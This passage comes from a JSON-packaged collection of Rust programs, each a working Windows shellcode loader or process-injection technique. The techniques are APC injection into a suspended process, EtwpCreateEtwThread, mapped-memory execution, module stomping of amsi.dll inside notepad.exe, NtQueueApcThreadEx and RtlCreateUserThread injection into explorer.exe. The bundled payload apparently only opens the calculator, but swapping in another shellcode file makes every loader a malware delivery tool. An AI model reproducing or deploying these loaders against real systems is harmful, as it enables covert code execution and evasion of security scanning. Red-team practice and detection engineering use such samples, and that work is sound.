windows_sys::Win32::System::Memory::{\n VirtualAllocEx, VirtualProtectEx, MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE, PAGE_READWRITE,\n};\nuse windows_sys::Win32::System::Threading::{\n CreateProcessA, QueueUserAPC, ResumeThread, CREATE_NO_WINDOW, CREATE_SUSPENDED,\n PROCESS_INFORMATION, STARTF_USESTDHANDLES, STARTUPINFOA,\n};\n\n#[cfg(target_os = \"windows\")]\nfn main() {\n let shellcode = include_bytes!(\"../../w64-exec-calc-shellcode-func.bin\");\n let shellcode_size = shellcode.len();\n let program = b\"C:\\\\Windows\\\\System32\\\\calc.exe\\0\";\n\n unsafe {\n let mut pi: PROCESS_INFORMATION = zeroed();\n let mut si: STARTUPINFOA = zeroed();\n si.dwFlags = STARTF_USESTDHANDLES | CREATE_SUSPENDED;\n si.wShowWindow = 0;\n\n let res = CreateProcessA(\n program.as_ptr(),\n null_mut(),\n null(),\n null(),\n TRUE,\n CREATE_NO_WINDOW,\n null(),\n null(),\n &si,\n &mut pi,\n );\n if res == FALSE {\n panic!(\"[-]CreateProcessA failed: {}!\", GetLastError());\n }\n\n let addr = VirtualAllocEx(\n pi.hProcess,\n null(),\n shellcode_size,\n MEM_COMMIT | MEM_RESERVE,\n PAGE_READWRITE,\n );\n if addr.is_null() {\n panic!(\"[-]VirtualAllocEx failed: {}!\", GetLastError());\n }\n\n let res = WriteProcessMemory(\n pi.hProcess,\n addr,\n shellcode.as_ptr().cast(),\n shellcode_size,\n null_mut(),\n );\n if res == FALSE {\n panic!(\"[-]WriteProcessMemory failed: {}!\", GetLastError());\n }\n\n let mut old = PAGE_READWRITE;\n let res = VirtualProtectEx(pi.hProcess, addr, shellcode_size, PAGE_EXECUTE, &mut old);\n if res == FALSE {\n panic!(\"[-]VirtualProtectEx failed: {}!\", GetLastError());\n }\n\n let func = transmute(addr);\n let res = QueueUserAPC(Some(func), pi.hThread, 0);\n if res == 0 {\n panic!(\"[-]QueueUserAPC failed: {}!\", GetLastError());\n }\n let res = ResumeThread(pi.hThread);\n if res == 0u32 {\n panic!(\"[-]ResumeThread failed: {}!\", GetLastError());\n }\n\n let res = CloseHandle(pi.hProcess);\n if res == FALSE {\n panic!(\"[-]CloseHandle failed: {}!\", GetLastError());\n }\n\n let res = CloseHandle(pi.hThread);\n if res == FALSE {\n panic!(\"[-]CloseHandle failed: {}!\", GetLastError());\n }\n }\n}\n" }, { "path": "etwp_create_etw_thread/Cargo.toml", "content": "[package]\nname = \"etwp_create_etw_thread\"\nversion = \"0.1.0\"\nedition = \"2021\"\n\n# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html\n\n[dependencies]\nwindows-sys = { version = \"0.48.0\", features = [\"Win32_System_Memory\", \"Win32_Foundation\", \"Win32_System_LibraryLoader\", \"Win32_System_Threading\"] }\n" }, { "path": "etwp_create_etw_thread/src/main.rs", "content": "use std::ffi::c_void;\nuse std::mem::transmute;\nuse std::ptr::{copy, null};\nuse windows_sys::Win32::Foundation::{GetLastError, FALSE, HANDLE, WAIT_FAILED};\nuse windows_sys::Win32::System::LibraryLoader::{GetProcAddress, LoadLibraryA};\nuse windows_sys::Win32::System::Memory::{\n VirtualAlloc, VirtualProtect, MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE, PAGE_READWRITE,\n};\nuse windows_sys::Win32::System::Threading::WaitForSingleObject;\n\n#[cfg(target_os = \"windows\")]\nfn main() {\n let shellcode = include_bytes!(\"../../w64-exec-calc-shellcode-func.bin\");\n let shellcode_size = shellcode.len();\n\n unsafe {\n let ntdll = LoadLibraryA(b\"ntdll.dll\\0\".as_ptr());\n if ntdll == 0 {\n panic!(\"[-]LoadLibraryA failed: {}!\", GetLastError());\n }\n\n let fn_etwp_create_etw_thread = GetProcAddress(ntdll, b\"EtwpCreateEtwThread\\0\".as_ptr());\n\n let etwp_create_etw_thread: extern \"C\" fn(*mut c_void, isize) -> HANDLE =\n transmute(fn_etwp_create_etw_thread);\n\n let addr = VirtualAlloc(\n null(),\n shellcode_size,\n MEM_COMMIT | MEM_RESERVE,\n PAGE_READWRITE,\n );\n if addr.is_null() {\n panic!(\"[-]VirtualAlloc failed: {}!\", GetLastError());\n }\n\n copy(shellcode.as_ptr(), addr.cast(), shellcode_size);\n\n let mut old = PAGE_READWRITE;\n let res = VirtualProtect(addr, shellcode_size, PAGE_EXECUTE, &mut old);\n if res == FALSE {\n panic!(\"[-]VirtualProtect failed: {}!\", GetLastError());\n }\n\n let thread = etwp_create_etw_thread(addr, 0);\n if thread == 0 {\n panic!(\"[-]etwp_create_etw_thread failed: {}!\", GetLastError());\n }\n\n WaitForSingleObject(thread, WAIT_FAILED);\n }\n}\n" }, { "path": "memmap2_transmute/Cargo.toml", "content": "[package]\nname = \"memmap2_transmute\"\nversion = \"0.1.0\"\nedition = \"2021\"\n\n# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html\n\n[dependencies]\nmemmap2 = \"0.6.1\"\n" }, { "path": "memmap2_transmute/src/main.rs", "content": "use memmap2::MmapOptions;\nuse std::mem::transmute;\n\n#[cfg(target_os = \"windows\")]\nfn main() {\n let shellcode = include_bytes!(\"../../w64-exec-calc-shellcode-func.bin\");\n let shellcode_size = shellcode.len();\n\n let mut mmap = MmapOptions::new()\n .len(shellcode_size)\n .map_anon()\n .expect(\"[-]mmap failed!\");\n mmap.copy_from_slice(shellcode);\n let mmap = mmap.make_exec().expect(\"[-]make_exec failed!\");\n\n unsafe {\n let shell: unsafe extern \"C\" fn() = transmute(mmap.as_ptr());\n shell();\n }\n}\n" }, { "path": "module_stomping/Cargo.toml", "content": "[package]\nname = \"module_stomping\"\nversion = \"0.1.0\"\nedition = \"2021\"\n\n# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html\n\n[dependencies]\nsysinfo = \"0.29.0\"\nwindows-sys = { version = \"0.48.0\", features = [\"Win32_System_Threading\", \"Win32_Foundation\", \"Win32_System_ProcessStatus\", \"Win32_System_Diagnostics_Debug\", \"Win32_System_LibraryLoader\", \"Win32_Security\", \"Win32_System_SystemInformation\", \"Win32_System_Memory\", \"Win32_System_SystemServices\"] }\n" }, { "path": "module_stomping/src/main.rs", "content": "use std::ffi::{c_void, CStr};\nuse std::mem::{size_of, size_of_val, transmute, zeroed};\nuse std::ptr::{addr_of_mut, null, null_mut};\nuse sysinfo::{PidExt, ProcessExt, System, SystemExt};\nuse windows_sys::Win32::Foundation::{CloseHandle, GetLastError, FALSE, HMODULE, WAIT_FAILED};\nuse windows_sys::Win32::System::Diagnostics::Debug::{\n ReadProcessMemory, WriteProcessMemory, IMAGE_NT_HEADERS64,\n};\nuse windows_sys::Win32::System::LibraryLoader::{GetModuleHandleA, GetProcAddress};\nuse windows_sys::Win32::System::Memory::{\n GetProcessHeap, HeapAlloc, VirtualAllocEx, HEAP_ZERO_MEMORY, MEM_COMMIT, MEM_RESERVE,\n PAGE_READWRITE,\n};\nuse windows_sys::Win32::System::ProcessStatus::{EnumProcessModules, GetModuleBaseNameA};\nuse windows_sys::Win32::System::SystemServices::IMAGE_DOS_HEADER;\nuse windows_sys::Win32::System::Threading::{\n CreateRemoteThread, OpenProcess, WaitForSingleObject, PROCESS_ALL_ACCESS,\n};\n\n#[cfg(target_os = \"windows\")]\nfn main() {\n let shellcode = include_bytes!(\"../../w64-exec-calc-shellcode-func.bin\");\n let shellcode_size = shellcode.len();\n\n let dll = \"C:\\\\windows\\\\system32\\\\amsi.dll\\0\";\n\n let mut system = System::new();\n system.refresh_processes();\n\n let pid = system\n .processes_by_name(\"notepad.exe\")\n .next()\n .expect(\"[-]no process!\")\n .pid()\n .as_u32();\n\n unsafe {\n let handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);\n if handle == 0 {\n panic!(\"[-]OpenProcess failed: {}!\", GetLastError());\n }\n\n let buffer = VirtualAllocEx(\n handle,\n null(),\n dll.len(),\n MEM_COMMIT | MEM_RESERVE,\n PAGE_READWRITE,\n );\n if buffer.is_null() {\n panic!(\"[-]VirtualAllocEx failed: {}!\", GetLastError());\n }\n\n let res = WriteProcessMemory(handle, buffer, dll.as_ptr().cast(), dll.len(), null_mut());\n if res == FALSE {\n panic!(\"[-]WriteProcessMemory failed: {}!\", GetLastError());\n }\n\n let thread_routine = GetProcAddress(\n GetModuleHandleA(b\"Kernel32\\0\".as_ptr()),\n b\"LoadLibraryA\\0\".as_ptr(),\n );\n if thread_routine.is_none() {\n panic!(\"[-]GetProcAddress failed: {}!\", GetLastError());\n }\n let dll_thread = CreateRemoteThread(\n handle,\n null(),\n 0,\n transmute(thread_routine),\n buffer,\n 0,\n null_mut(),\n );\n if dll_thread == 0 {\n panic!(\"[-]CreateRemoteThread failed: {}!\", GetLastError());\n }\n\n WaitForSingleObject(dll_thread, WAIT_FAILED);\n\n let mut modules: [HMODULE; 256] = zeroed();\n let mut needed = 0;\n EnumProcessModules(\n handle,\n modules.as_mut_ptr(),\n u32::try_from(size_of_val(&modules)).unwrap(),\n addr_of_mut!(needed),\n );\n let count = (needed as usize) / size_of::();\n for module in modules.into_iter().take(count) {\n let mut name: [u8; 128] = zeroed();\n GetModuleBaseNameA(\n handle,\n module,\n name.as_mut_ptr(),\n u32::try_from(size_of_val(&name)).unwrap(),\n );\n let name = CStr::from_bytes_until_nul(name.as_slice()).unwrap();\n if name.to_string_lossy() == \"amsi.dll\" {\n let addr = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x1000);\n ReadProcessMemory(handle, module as *const c_void, addr, 0x1000, null_mut());\n let dos_header = addr as *mut IMAGE_DOS_HEADER;\n let nt_header = ((addr as usize) + ((*dos_header).e_lfanew as usize))\n as *mut IMAGE_NT_HEADERS64;\n let entry_point = (((*nt_header).OptionalHeader.AddressOfEntryPoint as usize)\n + (module as usize)) as *mut c_void;\n WriteProcessMemory(\n handle,\n entry_point,\n shellcode.as_ptr().cast(),\n shellcode_size,\n null_mut(),\n );\n CreateRemoteThread(\n handle,\n null(),\n 0,\n transmute(entry_point),\n null(),\n 0,\n null_mut(),\n );\n };\n\n }\n CloseHandle(handle);\n }\n}\n" }, { "path": "nt_queue_apc_thread_ex_local/Cargo.toml", "content": "[package]\nname = \"nt_queue_apc_thread_ex_local\"\nversion = \"0.1.0\"\nedition = \"2021\"\n\n# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html\n\n[dependencies]\nwindows-sys = { version = \"0.48.0\", features = [\"Win32_System_Memory\", \"Win32_Foundation\", \"Win32_System_Threading\", \"Win32_System_LibraryLoader\"] }\n" }, { "path": "nt_queue_apc_thread_ex_local/src/main.rs", "content": "use std::ffi::c_void;\nuse std::mem::transmute;\nuse std::ptr::{copy, null};\nuse windows_sys::Win32::Foundation::{GetLastError, FALSE, HANDLE};\nuse windows_sys::Win32::System::LibraryLoader::{GetProcAddress, LoadLibraryA};\nuse windows_sys::Win32::System::Memory::{\n VirtualAlloc, VirtualProtect, MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE, PAGE_READWRITE,\n};\nuse windows_sys::Win32::System::Threading::GetCurrentThread;\n\n#[cfg(target_os = \"windows\")]\nfn main() {\n let shellcode = include_bytes!(\"../../w64-exec-calc-shellcode-func.bin\");\n let shellcode_size = shellcode.len();\n\n unsafe {\n let ntdll = LoadLibraryA(b\"ntdll.dll\\0\".as_ptr());\n if ntdll == 0 {\n panic!(\"[-]LoadLibraryA failed: {}!\", GetLastError());\n }\n\n let fn_nt_queue_apc_thread_ex = GetProcAddress(ntdll, b\"NtQueueApcThreadEx\\0\".as_ptr());\n\n let nt_queue_apc_thread_ex: extern \"C\" fn(HANDLE, isize, *mut c_void, isize, isize, isize) =\n transmute(fn_nt_queue_apc_thread_ex);\n\n let addr = VirtualAlloc(\n null(),\n shellcode_size,\n MEM_COMMIT | MEM_RESERVE,\n PAGE_READWRITE,\n );\n if addr.is_null() {\n panic!(\"[-]VirtualAlloc failed: {}!\", GetLastError());\n }\n\n copy(shellcode.as_ptr(), addr.cast(), shellcode_size);\n\n let mut old = PAGE_READWRITE;\n let res = VirtualProtect(addr, shellcode_size, PAGE_EXECUTE, &mut old);\n if res == FALSE {\n panic!(\"[-]VirtualProtect failed: {}!\", GetLastError());\n }\n\n let handle = GetCurrentThread();\n if handle == 0 {\n panic!(\"[-]OpenProcess failed: {}!\", GetLastError());\n }\n\n nt_queue_apc_thread_ex(handle, 1, addr, 0, 0, 0);\n }\n}\n" }, { "path": "rtl_create_user_thread/Cargo.toml", "content": "[package]\nname = \"rtl_create_user_thread\"\nversion = \"0.1.0\"\nedition = \"2021\"\n\n# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html\n\n[dependencies]\nsysinfo = \"0.29.0\"\nwindows-sys = { version = \"0.48.0\", features = [\"Win32_System_Threading\", \"Win32_Foundation\", \"Win32_System_Memory\", \"Win32_System_Diagnostics_Debug\", \"Win32_System_LibraryLoader\"] }" }, { "path": "rtl_create_user_thread/src/main.rs", "content": "use std::ffi::c_void;\nuse std::mem::transmute;\nuse std::ptr::{null, null_mut};\nuse sysinfo::{PidExt, ProcessExt, System, SystemExt};\nuse windows_sys::Win32::Foundation::{CloseHandle, GetLastError, FALSE, HANDLE};\nuse windows_sys::Win32::System::Diagnostics::Debug::WriteProcessMemory;\nuse windows_sys::Win32::System::LibraryLoader::{GetProcAddress, LoadLibraryA};\nuse windows_sys::Win32::System::Memory::{\n VirtualAllocEx, VirtualProtectEx, MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE, PAGE_READWRITE,\n};\nuse windows_sys::Win32::System::Threading::{OpenProcess, PROCESS_ALL_ACCESS};\n\n#[cfg(target_os = \"windows\")]\nfn main() {\n let shellcode = include_bytes!(\"../../w64-exec-calc-shellcode-func.bin\");\n let shellcode_size = shellcode.len();\n let mut old = PAGE_READWRITE;\n\n let mut system = System::new();\n system.refresh_processes();\n let pid = system\n .processes_by_name(\"explorer.exe\")\n .next()\n .expect(\"[-]no process!\")\n .pid()\n .as_u32();\n\n unsafe {\n let ntdll = LoadLibraryA(b\"ntdll.dll\\0\".as_ptr());\n if ntdll == 0 {\n panic!(\"[-]LoadLibraryA failed: {}!\", GetLastError());\n }\n\n let fn_rtl_create_user_thread = GetProcAddress(ntdll, b\"RtlCreateUserThread\\0\".as_ptr());\n\n let rtl_create_user_thread: extern \"C\" fn(\n HANDLE,\n isize,\n isize,\n isize,\n isize,\n isize,\n *mut c_void,\n isize,\n *mut HANDLE,\n isize,\n ) = transmute(fn_rtl_create_user_thread);\n\n let handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);\n if handle == 0 {\n panic!(\"[-]OpenProcess failed: {}!\", GetLastError());\n }\n\n let addr = VirtualAllocEx(\n handle,\n null(),\n shellcode_size,\n MEM_COMMIT | MEM_RESERVE,\n PAGE_READWRITE,\n );\n if addr.is_null() {\n panic!(\"[-]VirtualAllocEx failed: {}!\", GetLastError());\n }\n\n let res = WriteProcessMemory(\n handle,\n addr,\n shellcode.as_ptr().cast(),\n shellcode_size,\n null_mut(),\n );\n if res == FALSE {\n panic!(\"[-]WriteProcessMemory failed: {}!\", GetLastError());\n }\n\n let res = VirtualProtectEx(handle, addr, shellcode_size, PAGE_EXECUTE, &mut old);\n if res == FALSE {\n panic!(\"[-]VirtualProtectEx failed: {}!\", GetLastError());\n }\n\n let mut thraed: HANDLE = 0;\n rtl_create_user_thread(handle, 0, 0, 0, 0, 0, addr, 0, &mut thraed, 0);\n\n let res = CloseHandle(handle);\n if res == FALSE {\n panic!(\"[-]CloseHandle failed: {}!\", GetLastError());\n }\n }\n}\n" }, { "path": "rustfmt.toml", "content": "" } ]